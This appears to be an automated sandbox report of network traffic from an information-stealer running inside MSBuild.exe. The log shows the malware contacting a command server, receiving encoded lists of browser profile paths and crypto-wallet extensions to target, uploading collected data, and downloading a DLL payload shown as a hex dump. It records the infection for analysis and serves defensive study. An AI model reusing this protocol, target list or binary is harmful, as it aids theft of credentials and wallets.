26 Jul 2024 16:56:05 GMT Content-Length: 34725 Connection: close Set-Cookie: sessionid=be9b154f23111581c02084ed; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
2024-07-26 16:56:05 UTC	14514	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-07-26 16:56:05 UTC	10062	IN	Data Raw: 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 61 69 6e 65 72 27 2c 20 27 63 6f 72 72 65 63 74 46 6f 72 53 63 72 65 65 6e 53 69 7a 65 27 3a 20 66 61 6c 73 65 7d 29 3b 0d 0a 09 09 7d 29 3b 0d 0a 09 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 09 09 3c 64 69 76 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 73 22 3e 0d 0a 09 09 09 3c 64 69 76 20 72 6f 6c 65 3d 22 6e Data Ascii: enDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#global_header .supernav_container', 'correctForScreenSize': false});});</script><div id="global_actions"><div role="n
2024-07-26 16:56:05 UTC	10149	IN	Data Raw: 6b 61 6d 61 69 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 4f 4d 4d 55 4e 49 54 59 5f 43 44 4e 5f 41 53 53 45 54 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 64 6e 2e 61 6b 61 6d 61 69 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 5c 2f 70 75 62 6c 69 63 5c 2f 61 73 73 65 74 73 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 53 54 4f 52 45 5f 43 44 4e 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 6f 72 65 2e 61 6b 61 6d 61 69 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 50 55 42 4c 49 43 5f 53 48 41 52 45 44 5f 55 52 4c 26 71 75 6f Data Ascii: kamai.steamstatic.com\/","COMMUNITY_CDN_ASSET_URL":"https:\/\/cdn.akamai.steamstatic.com\/steamcommunity\/public\/assets\/","STORE_CDN_URL":"https:\/\/store.akamai.steamstatic.com\/","PUBLIC_SHARED_URL&quo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49731	5.75.212.60	443	7280	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 16:56:07 UTC	230	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 Host: 5.75.212.60 Connection: Keep-Alive Cache-Control: no-cache
2024-07-26 16:56:07 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Jul 2024 16:56:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-07-26 16:56:07 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49732	5.75.212.60	443	7280	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 16:56:08 UTC	322	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----CFHCGHJDBFIIDGDHIJDB User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 Host: 5.75.212.60 Content-Length: 279 Connection: Keep-Alive Cache-Control: no-cache
2024-07-26 16:56:08 UTC	279	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 46 48 43 47 48 4a 44 42 46 49 49 44 47 44 48 49 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 36 43 41 34 31 41 45 32 37 32 39 34 32 36 36 34 39 38 37 32 31 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 2d 31 31 65 65 2d 38 63 31 38 2d 38 30 36 65 36 66 36 65 36 39 36 33 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 43 47 48 4a 44 42 46 49 49 44 47 44 48 49 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 30 38 33 37 62 31 64 34 35 61 61 37 66 30 65 63 66 32 64 66 35 35 32 61 37 63 61 38 33 32 61 0d 0a 2d 2d 2d 2d 2d 2d Data Ascii: ------CFHCGHJDBFIIDGDHIJDBContent-Disposition: form-data; name="hwid"B6CA41AE27294266498721-a33c7340-61ca-11ee-8c18-806e6f6e6963------CFHCGHJDBFIIDGDHIJDBContent-Disposition: form-data; name="build_id"b0837b1d45aa7f0ecf2df552a7ca832a------
2024-07-26 16:56:08 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Jul 2024 16:56:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-07-26 16:56:08 UTC	69	IN	Data Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 35 61 36 34 31 64 35 33 64 63 65 63 31 61 62 66 30 63 66 36 62 64 32 66 36 62 63 36 31 37 34 64 7c 31 7c 31 7c 31 7c 30 7c 31 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a Data Ascii: 3a1\|1\|1\|1\|5a641d53dcec1abf0cf6bd2f6bc6174d\|1\|1\|1\|0\|1\|50000\|10

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49733	5.75.212.60	443	7280	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 16:56:09 UTC	322	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----DGHDHIDGHIDGIECBKKJJ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 Host: 5.75.212.60 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-07-26 16:56:09 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 44 47 48 44 48 49 44 47 48 49 44 47 49 45 43 42 4b 4b 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 61 36 34 31 64 35 33 64 63 65 63 31 61 62 66 30 63 66 36 62 64 32 66 36 62 63 36 31 37 34 64 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 44 48 49 44 47 48 49 44 47 49 45 43 42 4b 4b 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 30 38 33 37 62 31 64 34 35 61 61 37 66 30 65 63 66 32 64 66 35 35 32 61 37 63 61 38 33 32 61 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 44 48 49 44 47 48 49 44 47 49 45 43 42 4b 4b 4a 4a 0d 0a 43 6f 6e 74 Data Ascii: ------DGHDHIDGHIDGIECBKKJJContent-Disposition: form-data; name="token"5a641d53dcec1abf0cf6bd2f6bc6174d------DGHDHIDGHIDGIECBKKJJContent-Disposition: form-data; name="build_id"b0837b1d45aa7f0ecf2df552a7ca832a------DGHDHIDGHIDGIECBKKJJCont
2024-07-26 16:56:10 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Jul 2024 16:56:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-07-26 16:56:10 UTC	1564	IN	Data Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45 Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49734	5.75.212.60	443	7280	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 16:56:11 UTC	322	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----IIDHJDGCGDAAKEBGDBKF User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 Host: 5.75.212.60 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-07-26 16:56:11 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 49 49 44 48 4a 44 47 43 47 44 41 41 4b 45 42 47 44 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 61 36 34 31 64 35 33 64 63 65 63 31 61 62 66 30 63 66 36 62 64 32 66 36 62 63 36 31 37 34 64 0d 0a 2d 2d 2d 2d 2d 2d 49 49 44 48 4a 44 47 43 47 44 41 41 4b 45 42 47 44 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 30 38 33 37 62 31 64 34 35 61 61 37 66 30 65 63 66 32 64 66 35 35 32 61 37 63 61 38 33 32 61 0d 0a 2d 2d 2d 2d 2d 2d 49 49 44 48 4a 44 47 43 47 44 41 41 4b 45 42 47 44 42 4b 46 0d 0a 43 6f 6e 74 Data Ascii: ------IIDHJDGCGDAAKEBGDBKFContent-Disposition: form-data; name="token"5a641d53dcec1abf0cf6bd2f6bc6174d------IIDHJDGCGDAAKEBGDBKFContent-Disposition: form-data; name="build_id"b0837b1d45aa7f0ecf2df552a7ca832a------IIDHJDGCGDAAKEBGDBKFCont
2024-07-26 16:56:11 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Jul 2024 16:56:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-07-26 16:56:11 UTC	5685	IN	Data Raw: 31 36 32 38 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62 Data Ascii: 1628TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49735	5.75.212.60	443	7280	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 16:56:12 UTC	322	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----GIJJKFCGDGHDHIECGCBK User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 Host: 5.75.212.60 Content-Length: 332 Connection: Keep-Alive Cache-Control: no-cache
2024-07-26 16:56:12 UTC	332	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 47 49 4a 4a 4b 46 43 47 44 47 48 44 48 49 45 43 47 43 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 61 36 34 31 64 35 33 64 63 65 63 31 61 62 66 30 63 66 36 62 64 32 66 36 62 63 36 31 37 34 64 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 4a 4b 46 43 47 44 47 48 44 48 49 45 43 47 43 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 30 38 33 37 62 31 64 34 35 61 61 37 66 30 65 63 66 32 64 66 35 35 32 61 37 63 61 38 33 32 61 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 4a 4b 46 43 47 44 47 48 44 48 49 45 43 47 43 42 4b 0d 0a 43 6f 6e 74 Data Ascii: ------GIJJKFCGDGHDHIECGCBKContent-Disposition: form-data; name="token"5a641d53dcec1abf0cf6bd2f6bc6174d------GIJJKFCGDGHDHIECGCBKContent-Disposition: form-data; name="build_id"b0837b1d45aa7f0ecf2df552a7ca832a------GIJJKFCGDGHDHIECGCBKCont
2024-07-26 16:56:13 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Jul 2024 16:56:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-07-26 16:56:13 UTC	119	IN	Data Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49736	5.75.212.60	443	7280	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 16:56:13 UTC	323	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----CAAAAFBKFIECAAKECGCA User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 Host: 5.75.212.60 Content-Length: 5605 Connection: Keep-Alive Cache-Control: no-cache
2024-07-26 16:56:13 UTC	5605	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 41 41 41 41 46 42 4b 46 49 45 43 41 41 4b 45 43 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 61 36 34 31 64 35 33 64 63 65 63 31 61 62 66 30 63 66 36 62 64 32 66 36 62 63 36 31 37 34 64 0d 0a 2d 2d 2d 2d 2d 2d 43 41 41 41 41 46 42 4b 46 49 45 43 41 41 4b 45 43 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 30 38 33 37 62 31 64 34 35 61 61 37 66 30 65 63 66 32 64 66 35 35 32 61 37 63 61 38 33 32 61 0d 0a 2d 2d 2d 2d 2d 2d 43 41 41 41 41 46 42 4b 46 49 45 43 41 41 4b 45 43 47 43 41 0d 0a 43 6f 6e 74 Data Ascii: ------CAAAAFBKFIECAAKECGCAContent-Disposition: form-data; name="token"5a641d53dcec1abf0cf6bd2f6bc6174d------CAAAAFBKFIECAAKECGCAContent-Disposition: form-data; name="build_id"b0837b1d45aa7f0ecf2df552a7ca832a------CAAAAFBKFIECAAKECGCACont
2024-07-26 16:56:14 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Jul 2024 16:56:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-07-26 16:56:14 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49737	5.75.212.60	443	7280	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 16:56:15 UTC	238	OUT	GET /sqls.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 Host: 5.75.212.60 Connection: Keep-Alive Cache-Control: no-cache
2024-07-26 16:56:15 UTC	261	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Jul 2024 16:56:15 GMT Content-Type: application/octet-stream Content-Length: 2459136 Connection: close Last-Modified: Friday, 26-Jul-2024 16:56:15 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-07-26 16:56:15 UTC	16123	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$7ZYZYZYZnY\Y]YXYYZXYO\EYO]UYOZLYl3][Yl3Y[Yl3[Yl3[[YRichZY
2024-07-26 16:56:15 UTC	16384	IN	Data Raw: 00 e9 9c 25 1b 00 e9 3a f0 19 00 e9 9e cd 1e 00 e9 ba 58 1d 00 e9 7e 65 1b 00 e9 1b f0 1c 00 e9 01 21 1c 00 e9 b9 2a 1f 00 e9 d7 46 00 00 e9 92 83 17 00 e9 c5 ed 1e 00 e9 e8 57 03 00 e9 fa 7c 1b 00 e9 3e e1 00 00 e9 bd f4 1a 00 e9 b4 7c 00 00 e9 bf ca 1c 00 e9 4c db 1a 00 e9 31 31 1a 00 e9 34 e5 1c 00 e9 36 f1 1d 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: %:X~e!*FW\|>\|L1146
2024-07-26 16:56:16 UTC	16384	IN	Data Raw: c3 0f 1f 40 00 8a 10 3a 11 75 1a 84 d2 74 12 8a 50 01 3a 51 01 75 0e 83 c0 02 83 c1 02 84 d2 75 e4 33 c0 eb 05 1b c0 83 c8 01 85 c0 74 15 83 c6 0c 47 81 fe c0 03 00 00 72 bf 5f 5e b8 0c 00 00 00 5b c3 8d 0c 7f 8b 14 8d 38 25 24 10 8d 04 8d 34 25 24 10 85 d2 75 09 8b 10 89 14 8d 38 25 24 10 8b 4c 24 18 85 c9 5f 0f 44 ca 5e 89 08 33 c0 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 33 ff 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 53 6a 02 6a ff ff 74 24 1c 56 e8 78 0c 15 00 8b d8 83 c4 10 85 db 74 21 6a 00 ff 74 24 24 ff 74 24 24 ff 74 24 24 53 56 e8 9a 68 04 00 53 56 8b f8 Data Ascii: @:utP:Quu3tGr_^[8%$4%$u8%$L$_D^3[Vt$W3FtPh $Sjjt$Vxt!jt$$t$$t$$SVhSV
2024-07-26 16:56:16 UTC	16384	IN	Data Raw: 77 12 8d 1c 9b 46 8d 5b e8 8d 1c 59 0f be 0e 83 f9 30 7d e9 89 74 24 74 81 e3 ff ff ff 7f 89 5c 24 30 83 f9 6c 75 35 4e 0f be 4e 01 46 89 74 24 74 85 c9 0f 85 f0 fd ff ff eb 21 0f be 4e 01 46 c6 44 24 37 01 89 74 24 74 83 f9 6c 75 0e 0f be 4e 01 46 89 74 24 74 c6 44 24 37 02 8b 44 24 38 33 f6 89 44 24 58 ba 70 53 21 10 c7 44 24 50 70 53 21 10 c6 44 24 2e 11 0f be 02 3b c8 74 16 83 c2 06 46 81 fa fa 53 21 10 7c ed 8a 4c 24 2e 8b 54 24 50 eb 19 8d 04 76 8a 0c 45 73 53 21 10 8d 14 45 70 53 21 10 89 54 24 50 88 4c 24 2e 0f b6 c1 83 f8 10 0f 87 d9 14 00 00 ff 24 85 24 e1 00 10 c6 44 24 37 01 c6 44 24 43 00 f6 42 02 01 0f 84 97 00 00 00 80 7c 24 2d 00 74 44 8b 74 24 70 8b 56 04 39 16 7f 22 0f 57 c0 66 0f 13 44 24 68 8b 4c 24 6c 8b 74 24 68 8a 54 24 35 89 74 24 Data Ascii: wF[Y0}t$t\$0lu5NNFt$t!NFD$7t$tluNFt$tD$7D$83D$XpS!D$PpS!D$.;tFS!\|L$.T$PvEsS!EpS!T$PL$.$$D$7D$CB\|$-tDt$pV9"WfD$hL$lt$hT$5t$
2024-07-26 16:56:16 UTC	16384	IN	Data Raw: 20 89 44 24 24 3b c2 7f 0c 7c 18 8b 44 24 14 3b c8 73 06 eb 0e 8b 44 24 14 8b c8 89 44 24 20 89 54 24 24 a1 08 22 24 10 03 44 24 10 99 8b f8 8b ea 85 f6 0f 85 6b 01 00 00 3b 6c 24 24 0f 8f 91 00 00 00 7c 08 3b f9 0f 83 87 00 00 00 8b 44 24 10 99 6a 00 8b ca c7 44 24 48 00 00 00 00 8d 54 24 48 89 44 24 38 52 51 50 55 57 89 4c 24 50 e8 38 3a ff ff 40 50 8b 44 24 34 50 8b 80 dc 00 00 00 ff d0 8b f0 83 c4 10 85 f6 75 1e 8b 54 24 1c 8b 44 24 44 55 57 ff 74 24 18 8b 0a ff 70 04 52 8b 41 0c ff d0 83 c4 14 8b f0 8b 44 24 44 85 c0 74 09 50 e8 dd f4 12 00 83 c4 04 03 7c 24 34 8b 4c 24 20 13 6c 24 38 85 f6 0f 84 6a ff ff ff e9 d0 00 00 00 8b 7c 24 1c 